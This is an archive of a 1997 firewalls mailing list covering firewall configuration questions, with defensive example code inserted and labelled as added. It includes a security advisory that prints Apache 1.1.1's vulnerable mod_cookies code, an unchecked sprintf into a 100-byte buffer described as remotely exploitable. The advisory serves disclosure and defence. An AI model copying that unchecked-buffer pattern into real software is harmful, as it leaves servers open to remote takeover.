System/Security Manager
NATO Programming Centre.
It's the damndest job, but some poor schmuck has to do it!
From firewalls-owner Sat Jan 11 20:44:24 1997
From: jmperez@sprynet.com
Date: Sat, 11 Jan 1997 20:30:09 -0800
Message-Id: <199701120430.UAA04692@m7.sprynet.com>
Subject: RE: LINUX RedHat
To: Firewalls@GreatCircle.COM

I would appreciate hearing from anyone who has successfully installed a PC-based firewall in a LINUX RedHat environment. We have adopted LINUX RedHat for our company and would prefer the TIS FW Toolkit or some other similar product, although I know BSD OS is recommended most often.

I recall reading an EMAIL message on this forum sometime back about a person who charges $2,000 to install TIS FW Toolkit. Perhaps that person has had some experience with RedHat and would like to share his/her knowledge as to what FW would best configure with LINUX RedHat. I have read the LAN Magazine Dec 96 eval of some FWs but none address the RedHat OS.

Any help would be greatly appreciated. Thanks in advance.

J. Perez

From firewalls-owner Sun Jan 12 12:29:25 1997
From: Michael Werneburg
To: "'firewalls@greatcircle.com'"
Subject: SOCKS/HTTP filtering
Date: Sun, 12 Jan 1997 15:29:11 -0500

Our webserver sits behind a firewall which is configured to allow only incoming http/https and things like mail and news (obviously not intended for our web servers). Everything appears to be working, except:

A user of our web site is using a desktop browser behind a SOCKS gateway. Upon every attempt to submit a form via POST, he gets a bizarre message which reads "Your browser sent a non-HTTP compliant message."

I suspect that his SOCKS gateway is attempting some filtering, and decided that it didn't like the outgoing message. Does anyone have any experience with a problem resembling this?

-Michael

___________________________
Michael Werneburg
Trimark Investment Management Inc.
mwernebu@trimark.com
___________________________

From firewalls-owner Sun Jan 12 12:59:25 1997
Date: Sun, 12 Jan 1997 14:32:32 -0600 (CST)
From: Brian Mitchell
To: Rob Sansom
cc: firewalls-l
Subject: Re: RCP tcp/udp 111

On Fri, 10 Jan 1997, Rob Sansom wrote:

> Wow, I'm actually posting, and breaking my New Years resolution not to write
> email first thing in the morning...
>
> RPC Portmapper. Very bad to allow people to connect to this, since they can
> find out what sorts of RPC services you run on your host (if I'm correct).

Alas, blocking it does not really stop them from doing that, it just makes it a wee bit more difficult (and it really is not all that difficult, even without portmapper access). Nonetheless, it should be blocked...

Brian Mitchell / brian@saturn.net
http://www.saturn.net/~brian/security/

From firewalls-owner Sun Jan 12 17:59:26 1997
Date: Sun, 12 Jan 1997 19:50:43 -0700 (MST)
From: David Sacerdote
To: firewalls@greatcircle.com
Subject: Apache 1.1.1 overflow

Secure Networks Inc.
Security Advisory
January 12, 1997

Vulnerabilities in the Apache httpd

There is a serious vulnerability in the cookies module of the Apache httpd, version 1.1.1 and earlier, which makes it possible for remote individuals to obtain access to systems running the Apache httpd. Only sites which enabled mod_cookies, a nondefault option, are vulnerable.

Technical Details
~~~~~~~~~~~~~~~~~

The function make_cookie, in mod_cookies.c, uses a 100 byte buffer, new_cookie, to store information used to track web site users. The hostname, which even with the most cautious of resolver libraries can be up to 255 characters long, is stuffed into this buffer, along with the string "apache=" and a number.
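An added example, written for this archive page and not taken from the advisory or from Apache, that models the Set-Cookie value make_cookie() formats into its 100-byte buffer: a length check (snprintf measuring into a NULL buffer) beside a bounds-checked replacement for the unchecked sprintf(). COOKIE_NAME is assumed from the advisory's sample "Set-Cookie: Apache=..." line; the pid, time values and the 255-byte dot-free hostname are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not Apache code: models the cookie the advisory's
 * make_cookie() writes into new_cookie[100] (COOKIE_NAME, first hostname
 * label, pid, seconds, milliseconds, "; path=/") and adds the length check
 * the original sprintf() call lacks. COOKIE_NAME is assumed from the
 * advisory's sample output. */
#define COOKIE_NAME   "Apache="
#define NEW_COOKIE_SZ 100          /* the advisory's char new_cookie[100] */
#define COOKIE_FMT    "%s%s%d%ld%d; path=/"
#define MAX_HOSTNAME  255          /* longest name a resolver may return */

/* Mirrors the advisory's "if ((dot = strchr(rname,'.'))) *dot='\0';":
 * only the first label is kept. The cut happens only when a dot exists,
 * so a dot-free name of up to MAX_HOSTNAME bytes is used in full.
 * Returns a malloc'd copy; the caller frees it. */
static char *first_label(const char *rname)
{
    const char *dot = strchr(rname, '.');
    size_t n = dot ? (size_t)(dot - rname) : strlen(rname);
    char *label = malloc(n + 1);
    if (label == NULL)
        return NULL;
    memcpy(label, rname, n);
    label[n] = '\0';
    return label;
}

/* Length of the formatted cookie without its NUL. snprintf() with a NULL
 * buffer and size 0 measures the output without writing anything. */
size_t cookie_length(const char *rname, int pid, long secs, int msec)
{
    char *label = first_label(rname);
    if (label == NULL)
        return 0;
    int n = snprintf(NULL, 0, COOKIE_FMT, COOKIE_NAME, label, pid, secs, msec);
    free(label);
    return n < 0 ? 0 : (size_t)n;
}

/* Would the cookie plus its terminating NUL fit the fixed 100-byte buffer? */
int cookie_fits_fixed_buffer(const char *rname, int pid, long secs, int msec)
{
    return cookie_length(rname, pid, secs, msec) + 1 <= NEW_COOKIE_SZ;
}

/* Bounds-checked replacement for the unchecked sprintf(): formats into
 * out[outsz]; returns 0 on success, -1 with out emptied when the cookie
 * would not fit, so the caller can omit the header rather than send a
 * truncated one. */
int make_cookie_checked(char *out, size_t outsz, const char *rname,
                        int pid, long secs, int msec)
{
    if (out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';
    char *label = first_label(rname);
    if (label == NULL)
        return -1;
    int n = snprintf(out, outsz, COOKIE_FMT, COOKIE_NAME, label, pid, secs, msec);
    free(label);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';           /* discard the truncated result */
        return -1;
    }
    return 0;
}

/* Constructed sample values (pid and time are made up). */
#define SAMPLE_PID  9185
#define SAMPLE_SECS 852663571L
#define SAMPLE_MSEC 164

/* Builds a constructed dot-free hostname of MAX_HOSTNAME bytes and returns 1
 * if the checked builder rejects it and leaves the buffer empty, else 0. */
int oversized_name_is_rejected(void)
{
    char buf[NEW_COOKIE_SZ];
    char *h = malloc(MAX_HOSTNAME + 1);
    if (h == NULL)
        return 0;
    memset(h, 'a', MAX_HOSTNAME);
    h[MAX_HOSTNAME] = '\0';
    int rc = make_cookie_checked(buf, sizeof buf, h, SAMPLE_PID, SAMPLE_SECS, SAMPLE_MSEC);
    int rejected = rc == -1 && buf[0] == '\0' &&
                   !cookie_fits_fixed_buffer(h, SAMPLE_PID, SAMPLE_SECS, SAMPLE_MSEC);
    free(h);
    return rejected;
}

int main(void)
{
    char buf[NEW_COOKIE_SZ];
    if (make_cookie_checked(buf, sizeof buf, "localhost", SAMPLE_PID, SAMPLE_SECS, SAMPLE_MSEC) == 0)
        printf("Set-Cookie: %s (%zu bytes)\n", buf, strlen(buf));
    printf("255-byte dot-free name rejected: %d\n", oversized_name_is_rejected());
    return 0;
}
```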
The offending code reads:

    void make_cookie(request_rec *r)
    {
        struct timeval tv;
        char new_cookie[100]; /* blurgh */
        char *dot;
        const char *rname = pstrdup(r->pool, get_remote_host(r->connection, r->per_dir_config, REMOTE_NAME));
        struct timezone tz = { 0 , 0 };

        if ((dot = strchr(rname,'.'))) *dot='\0'; /* First bit of hostname */
        gettimeofday(&tv, &tz);
        sprintf(new_cookie,"%s%s%d%ld%d; path=/", COOKIE_NAME, rname, (int)getpid(), (long)tv.tv_sec, (int)tv.tv_usec/1000 );
        table_set(r->headers_out,"Set-Cookie",new_cookie);
        return;
    }

Note that although the get_remote_host() function converts all uppercase letters to lowercase letters, there is at least one way in which a determined attacker can still exploit the overflow.

Impact
~~~~~~

Remote individuals can obtain access to the web server. If the httpd services requests as user root, attackers can obtain root access. If the httpd is run in a chroot() environment, the attacker will be restricted to the chrooted environment. We strongly advise administrators to run their web servers as an unprivileged user in a chrooted environment whenever possible.

Vulnerable Systems
~~~~~~~~~~~~~~~~~~

Any system running the Apache httpd 1.1.1 or earlier, with the compile-time option mod_cookies enabled, is vulnerable. To tell which web server software you are using, telnet to port 80 of the web server, and issue the command:

    GET / HTTP/1.0

to the web server, followed by two carriage returns. You should see something which looks like:

    $ telnet localhost 80
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    GET / HTTP/1.0

    HTTP/1.0 200 OK
    Date: Tue, 07 Jan 1997 18:59:31 GMT
    Server: Apache/1.1.1
    Content-type: text/html
    Set-Cookie: Apache=localhost9185266357164; path=/

From firewalls-owner Sun Jan 12 19:29:34 1997
Message-Id: <199701131209.VAA24418@kexin.kexin.co.kr>
From: "Jung Jun Lee"
To: "GreatCircle"
Subject: How can I configure hidden DNS on TIS?
Date: Mon, 13 Jan 1997 12:13:40 +0900

Hi..

If I configure TIS to primary DNS, can I use internal DNS for hidden?
Thanks

From firewalls-owner Sun Jan 12 19:46:27 1997
Date: Sun, 12 Jan 1997 21:14:44 -0700 (MST)
From: David Sacerdote
Reply-To: David Sacerdote
To: firewalls@greatcircle.com
Subject: truncated advisory

It appears that the advisory I just posted to the firewalls mailing list was truncated somewhere in the moderation or distribution process. The full text can be found at ftp://ftp.secnet.com/pub/advisories/APACHE_MOD.1.13.97

My apologies,
David Sacerdote

From firewalls-owner Sun Jan 12 21:47:55 1997
Message-ID: <32D9C7E1.41C6@encephalon.com>
Date: Sun, 12 Jan 1997 23:28:01 -0600
From: Joel Colvin
Organization: Colvin Training & Consulting
To: Firewalls Mailing List
Subject: tn-gw problems

I'm having trouble with tn-gw. It compiled without problems but when I telnet to it I get:

    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    pineal.encephalon.com telnet proxy (Version V2.0beta) ready:
    tn-gw-> Connection closed by foreign host.

The syslog shows a permit host, and if I have a welcome message then it is displayed before the connection closes. I have commented out everything in netperms-table except:

    netacl-telnetd: permit-hosts * -exec /usr/local/etc/tn-gw
    tn-gw: permit-hosts 127.0.0.1

I am using fwtk-2.0 but had the same problem with previous versions. Any ideas?

-- 
Joel Colvin

From firewalls-owner Sun Jan 12 23:59:27 1997
From: "Cihan Subasi (Garanti Tic)"
To: CihanS, firewall-digest, firewalls-owner, firewalls, mjp2
Subject: Re: RealAudio clients behind the FW...
Date: Mon, 13 Jan 97 09:51:00 PST
Message-Id: <32DA769B@SMTPGW.FW.GARANTI.COM.TR>

----------
But I'm running SOCKS PROXY on the FW and it seems like I can't set a SOCKS host on the RA client....
------------------------------------------------------------------------------

Set it to TCP.
At 03:32 PM 1/10/97 PST, you wrote:
>
> I'm having problems configuring FW to allow RealAudio packets...Port
>7070 seems open but data transmission on a UDP port do not occur...Please
>help....
>
> Thanks
> Cihan
>

Mike Papais
mjp2@chrysler.com
Chrysler Corporation
810-497-1193 (tie 897)

From firewalls-owner Mon Jan 13 00:15:28 1997
Message-ID: <01BC00FB.6E36AEC0@slip166-72-77-154.ga.us.ibm.net>
From: Gene Lee
To: "'firewalls@greatcircle.com'", "'Michael Werneburg'"
Subject: RE: SOCKS/HTTP filtering
Date: Mon, 13 Jan 1997 02:42:32 -0500

On Sunday, January 12, 1997 3:29 PM, Michael Werneburg[SMTP:MWernebu@trimark.com] wrote:
>Our webserver sits behind a firewall which is configured to allow only
>incoming http/https and things like mail and news (obviously not
>intended for our web servers). Everything appears to be working,
>except:
>
>A user of our web site is using desktop browser behind a SOCKS gateway.
>Upon every attempt to submit a form via POST, he gets a bizarre message
>which reads "Your browser sent a non-HTTP compliant message."
>
>I suspect that his SOCKS gateway is attempting some filtering, and
>decided that it didn't like the outgoing message. Does anyone have any
>experience with a problem resembling this?

Need more info. What kind of SOCKS server is he using? What kind of client is he using?

-- 
Gene Lee
genel@inforamp.net
genelee@vnet.ibm.com

From firewalls-owner Mon Jan 13 00:29:42 1997
Message-ID: <01BC00FB.12BE8B80@slip166-72-77-154.ga.us.ibm.net>
From: Gene Lee
To: mike, "'Gabriel Dura'"
Cc: "firewalls@GreatCircle.COM"
Subject: RE: FW-1 hacked? - Reply
Date: Mon, 13 Jan 1997 02:39:59 -0500

On Friday, January 10, 1997 11:10 AM, Gabriel Dura[SMTP:dura@geocities.com] wrote:
>
>There is a guy, working on his own, who claims he knows how to penetrate
>FBI's firewall.
>As a proof I was told that behind the firewall there is another
>computer 'phi.fbi.gov'.

Just because you can name a hostname behind the firewall is no proof of penetration.
A good example is a "polite" SMTP (also NNTP) transaction, say through a SOCKS server: the host sending the message also sends its hostname, which means that the e-mail has an internal hostname in its header. All this and still no firewall breach (although some may argue that the leakage of internal addresses may constitute some form of compromise - but it's still through no action on the part of an attacker).

If I were you, I'd ask for a bit more proof than a flimsy internal hostname...

-- 
Gene Lee
genel@inforamp.net
genelee@vnet.ibm.com

From firewalls-owner Mon Jan 13 00:53:27 1997
From: "Xavier Fauquet"
To: "Henry W. Farkas", "Starkweather, Mike"
Cc: "'firewalls@GreatCircle.COM'"
Subject: Re: Pointcast
Date: Sun, 12 Jan 1997 22:29:10 +0100
Message-ID: <19970113081407269.AAC300@kafka.imatranet.com>

And what should I do on the firewall if I want to stop Pointcast traffic?

Xavier

----------
> From: Henry W. Farkas
> To: Starkweather, Mike
> Cc: 'firewalls@GreatCircle.COM'
> Subject: Re: Pointcast
> Date: mercredi 8 janvier 1997 13:56
>
> On Tue, 7 Jan 1997, Starkweather, Mike wrote:
>
> > I am wondering how the members of this mail list have handled the
> > flood of traffic generated by Pointcast. It has buried our firewall
> > (Tis Toolkit) with the huge number of requests it generates. Their
> > I-Server seems to help some but not as much as I had hoped.
>
> For starters, you might ask everyone to update on a limited schedule,
> customized schedule, or manually: that is, only when the update button
> is pressed.
>
> We had the same problem. It turns out that most people simply did not
> understand the implications of the "all day schedule" option, which claims
> to be "best for direct internet connections". So, that's what many people
> chose.
>
> Simply informing them helped quite a bit, but we are still considering
> getting our own Pointcast server. Partly because there is an "early
> morning slam" on our firewalls, caused by a flood of people coming in,
> updating Pointcast and reading Dilbert....
>
> ===============================================================================
> Outside of a dog, a book is a man's best friend.
> Inside of a dog, it's too dark to read.
> PGP fingerprint AA D0 F5 44 C1 8C 11 52 - B3 80 34 1C CE 38 EC 53

From firewalls-owner Mon Jan 13 01:44:26 1997
Message-Id: <3.0.32.19970113202813.00917420@connectnet.net.au>
Date: Mon, 13 Jan 1997 20:28:15 +1100
To: firewalls@GreatCircle.COM
From: Andrew Whittle
Subject: Re: Pointcast

I downloaded the new version of the Pointcast plugin yesterday; it now supports getting the files via web proxies. Get the new version and make your staff turn on the proxy...
Andrew

-- 
=========================================================================
- Andrew Whittle - andrew@connectoz.net -
- http://www.connectoz.net/~andrew/ -
=========================================================================

From firewalls-owner Mon Jan 13 02:15:57 1997
Message-Id: <199701131655.RAA17194@winternet.co.at>
Reply-to: rammeri@winternet.co.at
From: rammeri@winternet.co.at
To: firewalls@greatcircle.com
Subject: Secure firewall with only Linux-Kernel filtering possible?
Date: Mon, 13 Jan 1997 17:55:18 +0100

Assume the following situation: We are a company with 25 computer systems in a LAN, and with a 64k connection to the internet. So ... my question is ... is the following security schema good, or why not?

Our LAN is divided into several parts, so we use 192.168.0.0 - 192.168.4.0 for our internet network. Between the router to the internet and the first local router, we have a firewall setup with only the Linux kernel filtering/masquerading. The firewall allows any connections to be made from the internal net.
But disallows any connection but a port 25 that will be forwarded to out mail-host in the internal net (even this connection is limited to our MX host). The firewall disallows incoming ftp-data. On the firewall there is NO daemon runnning, not even telnet for administration or sth. like this. ... Ok .. so tell me please, why is this setup insecure? thx, ingo -- ---------------------------------------------------------------------- No need to turn out the light | Email: rammeri@winternet.co.at you feel so depressed inside | SMS: +436643552547@text.mobilkom.at when you think of all your | Phone: +43-664-3552547 wasted years at night | +43-7253-7697 ---------------------------------------------------------------------- From firewalls-owner Mon Jan 13 02:29:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA12849 for firewalls-outgoing; Mon, 13 Jan 1997 02:22:33 -0800 (PST) Received: from gatekeeper.ing.nl (gatekeeper.ing.nl [194.178.239.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id CAA12841 for ; Mon, 13 Jan 1997 02:22:25 -0800 (PST) From: Robin.Pollard@mail.ing.nl Received: by ING-mailhub; id AA25016; Mon, 13 Jan 1997 11:23:03 +0100 X400-Originator: Robin.Pollard@mail.ing.nl X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/PRMD=ING GROEP/ADMD=400NET/C=NL/;0013700002243427000002] X400-Content-Type: P2-1988 (22) Message-Id: <0013700002243427000002*@MHS> To: firewalls Subject: Re: cc:Mail through a FireWall Date: Mon, 13 Jan 1997 11:18:21 +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As yet I have not put it through a firewall but I can tell you cc:Mail listens on one of two ports: Port 21 - AAaargghhh ! was the original port they used (though they are not using FTP they are using their own protocol) You can test this by FTPing to a cc:Mail router, you won't get far but you get something. 
Port CC0 - This is a new option from some revision of V5.x router software (5.12 I think). With 5.x router you need the parameter PORTcc0 on the command line; if you use router 6.x then cc0 is default and you need to put PORT21 on the command line if you wish to use 21.

Once it has contacted the listening router, the calling router opens another high port. Here is a "netstat -A" from one of our multisession OS/2 routers which at the time is listening on port 21 with one session and communicating to another router on another.

Active Internet connections
PCB   Proto Recv-Q Send-Q  Local Address      Foreign Address     (state)
888a  tcp        0      0  15.21.192.2.ftp    7.19.18.12.19493    TIME_WAIT
2d8a  tcp        0      0  15.21.192.2.3785   7.19.27.25.ftp      ESTABLISHED

We use 21 for backward compatibility, but this is internal net. Any one coming in from outside we would certainly force onto cc0. I don't know what rules the high port is assigned by; a little time with a packet sniffer could be in order soon.

Cheers,
Robin.

______________________________ Reply Separator _________________________________
Subject: cc:Mail through a FireWall
Author: F:firewalls-owner@GreatCircle.COM_at_INET-1 at ASD1CCGW
Date: 1/13/97 7:28 AM

Please share your experience routing cc:Mail through a firewall. For instance, what port does it use?

Thanks,
Patrick

From firewalls-owner Mon Jan 13 05:36:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA21962 for firewalls-outgoing; Mon, 13 Jan 1997 05:01:23 -0800 (PST)
Received: from macedonia.safhl.umn.edu (macedonia.safhl.umn.edu [128.101.165.27]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA21955 for ; Mon, 13 Jan 1997 05:01:15 -0800 (PST)
Received: (from jgc@localhost) by macedonia.safhl.umn.edu (8.8.4/8.8.4) id GAA04604; Mon, 13 Jan 1997 06:59:54 -0600 (CST)
Message-Id: <199701131259.GAA04604@macedonia.safhl.umn.edu>
Subject: Re: Secure firewall with only Linux-Kernel filtering possible?
To: rammeri@winternet.co.at, firewalls@greatcircle.com
Date: Mon, 13 Jan 1997 06:59:54 -0600 (CST)
From: "Jerry G. Champlin"
In-Reply-To: <199701131655.RAA17194@winternet.co.at> from "rammeri@winternet.co.at" at Jan 13, 97 05:55:18 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

rammeri@winternet.co.at stated:
>
> Assume the following situation:
>
> We are a company with 25 computer systems in a LAN, and with a 64k
> connection to the internet.
>
> So ... my question is ... is the following security-schema good or why
> not?
>
> Our LAN is divided into several parts, so we use 192.168.0.0 -
> 192.168.4.0 for our internet network.
> Between the router to the internet and the first local router, we have
> a firewall-setup with only the linux-kernel-filtering/masquerading.
> The firewall allows any connections to be made from the internal-net. But
> disallows any connection but a port 25 that will be forwarded to our
> mail-host in the internal net (even this connection is limited to our
> MX host).
> The firewall disallows incoming ftp-data.
> On the firewall there is NO daemon running, not even telnet for
> administration or sth. like this.

I have subverted similar setups out of necessity by using procmail and/or elm filters on the mail machine. You will want to make sure that you are running smrsh on the mail host and that you keep an eye on how people set up their mail handling. You do not want shell scripts, etc. to be executed on the mail host based on the content of mail messages unless it is absolutely necessary.

Make sure the basic internet services your users use function properly to fit your needs, or they will figure out a way to make things work by compromising your security from within.

The other thing I would think about is how you are protecting against outbound sessions being hijacked while port (data port in the case of ftp) negotiation is in progress.
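The policy Ingo describes, written out as a packet-by-packet evaluator, as an added example that is not code from the thread or from the Linux kernel filter. It models a stateless filter with masquerading: anything from the internal net may go out, replies to masqueraded sessions come back in, the only inbound hole is TCP port 25 to the MX, incoming ftp-data is refused, and everything else inbound is dropped. An anti-spoofing check on the external interface is added on top. The MX address 192.168.1.25, the firewall's external address 203.0.113.1, the outside hosts in 198.51.100.0/24 and the masquerade table are constructed values, and the masquerade lookup is a simplification of what the kernel keeps. Note what the filter never sees: the SMTP payload delivered to the MX, which is why the mail host itself (smrsh, filter handling) still has to be locked down.

```python
"""Stateless packet-filter policy for the setup described in this thread.

Added example (not from the thread): the rules Ingo describes on a Linux
kernel-filter/masquerade box, evaluated packet by packet, plus an
anti-spoofing check on the external interface.  MX address, external
address, outside hosts and the masquerade table are constructed values.
"""
from ipaddress import ip_address, ip_network

# The internal ranges Ingo names: 192.168.0.0 - 192.168.4.0 (five /24s).
INTERNAL_NETS = [ip_network(f"192.168.{n}.0/24") for n in range(5)]
MX_HOST = ip_address("192.168.1.25")   # assumed address of the internal mail host
SMTP, FTP_DATA = 25, 20

# Masquerade table (assumed, simplified): outbound sessions the kernel has
# rewritten, keyed by (remote address, remote port, port chosen on the
# firewall).  Replies matching an entry are the only inbound packets that
# pass without an explicit rule.
SAMPLE_MASQ_TABLE = {
    ("198.51.100.8", 80, 61000),   # an internal host browsing a web server
}

def is_internal(addr):
    """True if addr falls inside one of the internal networks."""
    a = ip_address(addr)
    return any(a in net for net in INTERNAL_NETS)

def decide(pkt, masq_table=frozenset()):
    """Return (verdict, reason) for one packet.

    pkt keys: iface ('ext' or 'int'), proto, src, sport, dst, dport.
    The order of the checks is the policy: anti-spoofing first, then the
    explicit denies, then masqueraded replies, then the single inbound
    hole, then default deny.
    """
    src, dst = pkt["src"], pkt["dst"]
    if pkt["iface"] == "ext":
        if is_internal(src):
            return "deny", "spoofed internal source address arriving from outside"
        if pkt["proto"] == "tcp" and pkt["sport"] == FTP_DATA:
            return "deny", "incoming ftp-data"
        if (src, pkt["sport"], pkt["dport"]) in masq_table:
            return "allow", "reply to a masqueraded outbound session"
        if pkt["proto"] == "tcp" and pkt["dport"] == SMTP and ip_address(dst) == MX_HOST:
            return "allow", "smtp to the MX host"
        return "deny", "default deny for inbound traffic"
    # Internal interface: anything from the internal net may go out, but a
    # packet there with an outside source address is just as bogus.
    if not is_internal(src):
        return "deny", "non-internal source address on the internal interface"
    return "allow", "any connection from the internal net"

# Constructed sample traffic, one dict per packet.
SAMPLE_PACKETS = [
    dict(iface="int", proto="tcp", src="192.168.2.10", sport=1500, dst="198.51.100.8", dport=80),
    dict(iface="ext", proto="tcp", src="198.51.100.8", sport=80, dst="203.0.113.1", dport=61000),
    dict(iface="ext", proto="tcp", src="198.51.100.20", sport=2000, dst="192.168.1.25", dport=25),
    dict(iface="ext", proto="tcp", src="198.51.100.20", sport=2001, dst="192.168.1.30", dport=25),
    dict(iface="ext", proto="tcp", src="198.51.100.20", sport=20, dst="203.0.113.1", dport=61001),
    dict(iface="ext", proto="tcp", src="192.168.1.5", sport=1234, dst="192.168.1.25", dport=25),
    dict(iface="ext", proto="tcp", src="198.51.100.20", sport=4000, dst="192.168.1.25", dport=23),
]

def evaluate_all(packets=SAMPLE_PACKETS, masq_table=SAMPLE_MASQ_TABLE):
    """Run the policy over a packet list; returns the list of verdicts."""
    return [decide(p, masq_table)[0] for p in packets]

if __name__ == "__main__":
    for p in SAMPLE_PACKETS:
        verdict, why = decide(p, SAMPLE_MASQ_TABLE)
        print(f"{p['iface']:>3} {p['src']}:{p['sport']} -> {p['dst']}:{p['dport']}  {verdict:5}  ({why})")
```

Running it shows the outbound web request, its masqueraded reply and SMTP to the MX allowed, while SMTP to any other internal host, incoming ftp-data, a packet claiming an internal source on the outside interface and inbound telnet are all dropped. The check order matters: a spoofed packet addressed to the MX on port 25 is refused by the anti-spoofing test before the SMTP rule is ever consulted.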
-Jerry

***************************************************************************
"If you plot a course of events like you plot murder, you'll be fine."
                                                          -- M. Harvey
***************************************************************************

From firewalls-owner Mon Jan 13 05:59:42 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA24379 for firewalls-outgoing; Mon, 13 Jan 1997 05:55:36 -0800 (PST)
Received: from data.tops.net (data.tops.net [194.162.222.70]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA24328 for ; Mon, 13 Jan 1997 05:54:52 -0800 (PST)
Received: from data.tops.net (armin@data.tops.net [194.162.222.70]) by data.tops.net (8.8.3/8.8.3) with SMTP id OAA29553; Sat, 13 Jan 1996 14:56:52 +0100
Date: Sat, 13 Jan 1996 14:56:51 +0100 (MET)
From: armin
To: rammeri@winternet.co.at
cc: firewalls@GreatCircle.COM
Subject: Re: Secure firewall with only Linux-Kernel filtering possible?
In-Reply-To: <199701131655.RAA17194@winternet.co.at>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

additionally:

- default policy for -I and -F (forward and incoming) should be deny
- for the outside world: deny all ports < 1024, except 25 (-F and -I)
- make a rule like this to deny ip-spoofing:
    ipfwadm -F -S 0.0.0.0/0 -D 192.168.4.0/24 -V IP-addr_of_ya_router
  - same 4 other LAN addr,
  - same for -I
- if not already done, turn off source-routing (kernel)
- sit down a minute and think 'bout sendmail =:) (don't use < 8.8.4)

best regards
-armin

----------------------------------------------
|real_name: armin ollig  e_mail: armin@tops.net|
|                                              |
|          Anthony's Law of Force:             |
|     Don't force it; get a larger hammer.     |
----------------------------------------------

On Mon, 13 Jan 1997 rammeri@winternet.co.at wrote:

> Assume the following situation:
>
> We are a company with 25 computer systems in a LAN, and with a 64k
> connection to the internet.
>
> So ... my question is ... is the following security-schema good or why
> not?
>
> Our LAN is divided into several parts, so we use 192.168.0.0 -
> 192.168.4.0 for our internet network.
> Between the router to the internet and the first local router, we have
> a firewall-setup with only the linux-kernel-filtering/masquerading.
> The firewall allows any connections to be made from the internal-net. But
> disallows any connection but a port 25 that will be forwarded to our
> mail-host in the internal net (even this connection is limited to our
> MX host).
> The firewall disallows incoming ftp-data.
> On the firewall there is NO daemon running, not even telnet for
> administration or sth. like this.
> ...
> Ok .. so tell me please, why is this setup insecure?
>
> thx,
> ingo
>
> --
> ----------------------------------------------------------------------
> No need to turn out the light  | Email: rammeri@winternet.co.at
> you feel so depressed inside   | SMS:   +436643552547@text.mobilkom.at
> when you think of all your     | Phone: +43-664-3552547
> wasted years at night          |        +43-7253-7697
> ----------------------------------------------------------------------

From firewalls-owner Mon Jan 13 06:29:30 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA25010 for firewalls-outgoing; Mon, 13 Jan 1997 06:04:14 -0800 (PST)
Received: from mail.Germany.EU.net (mail.germany.eu.net [192.76.144.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA25003 for ; Mon, 13 Jan 1997 06:03:51 -0800 (PST)
Received: by mail.Germany.EU.net with ESMTP (5.59+:34/EUnetD-2.6.1.h) via EUnet id PAA08649; Mon, 13 Jan 1997 15:03:20 +0100
Received: by mail.Munich.Germany.EU.net with UUCP (8.6.5:29/EUnetPoP-1.1.9) via EUnet id OAA12582; Mon, 13 Jan 1997 14:51:45 +0100
Received: by sunti1.sdm.de (Sendmail5.67a8/IDA-1.5) id AA27839; Mon, 13 Jan 1997 14:15:28 +0100
Received: from GATEWAY by sunti1 with netnews for
 firewalls@greatcircle.com (firewalls@greatcircle.com)
To: firewalls@greatcircle.com
Date: 13 Jan 1997 13:15:26 GMT
From: pichel@sdm.de (Joerg Pichel)
Message-Id: <5bdche$g91@sunti1.sdm.de>
Organization: sd&m GmbH & Co. KG, Munich, Germany
References: <3260f4f5.1934095@copley.fi.mckinsey.com>
Reply-To: pichel@sdm.de
Subject: Re: (fwd) Firewall-1 query
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> On Thu, 10 Oct 1996 07:01:50 +0100 (BST), Jon Whitton wrote:
> >
> >I have been looking at firewall-1 as a security solution and have one
> >major query.
> >
> >It appears to work at the IP layer and basically allows or denies packets
> >depending on certain rules. (This is only from the Checkpoint web site.)
> >
> >My question is how does this secure say sendmail since sendmail will be
> >running directly on the firewall machine and not a proxy.
> >Surely if sendmail is running on the firewall then when (not if!) a new
> >bug is found in sendmail, this bug can just be exploited on the firewall.

FW-1 doesn't secure sendmail in its protocol-layer (smtp). It just restricts who can speak smtp to whom. This _is_ insecure regarding SMTP, of course. Use smapd from TIS-FWTK (for free) or wait for Firewall-1 Release 3.0, which comes with content security (filters SMTP-commands and viruses).

Jörg!
--
Jörg Pichel           |s |d &|m |  software design & management
                      |  |  |  |  GmbH & Co. KG
                      |  |  |  |  Thomas-Dehler-Str. 27
joerg.pichel@sdm.de   |  |  |  |  81737 Muenchen
Tel/FAX: (089) 63812-112/150

From firewalls-owner Mon Jan 13 06:44:39 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA25623 for firewalls-outgoing; Mon, 13 Jan 1997 06:12:24 -0800 (PST)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA25612 for ; Mon, 13 Jan 1997 06:12:14 -0800 (PST)
Received: from uucp5.UU.NET by relay5.UU.NET with SMTP (peer crosschecked as: uucp5.UU.NET [192.48.96.36]) id QQbyia21059; Mon, 13 Jan 1997 09:12:01 -0500 (EST)
Received: from almserv.UUCP by uucp5.UU.NET with UUCP/RMAIL ; Mon, 13 Jan 1997 09:12:01 -0500
Received: from fanniemae.com (postman) by fnma.com (4.1/SMI-4.1) id AA17930; Mon, 13 Jan 97 09:04:39 EST
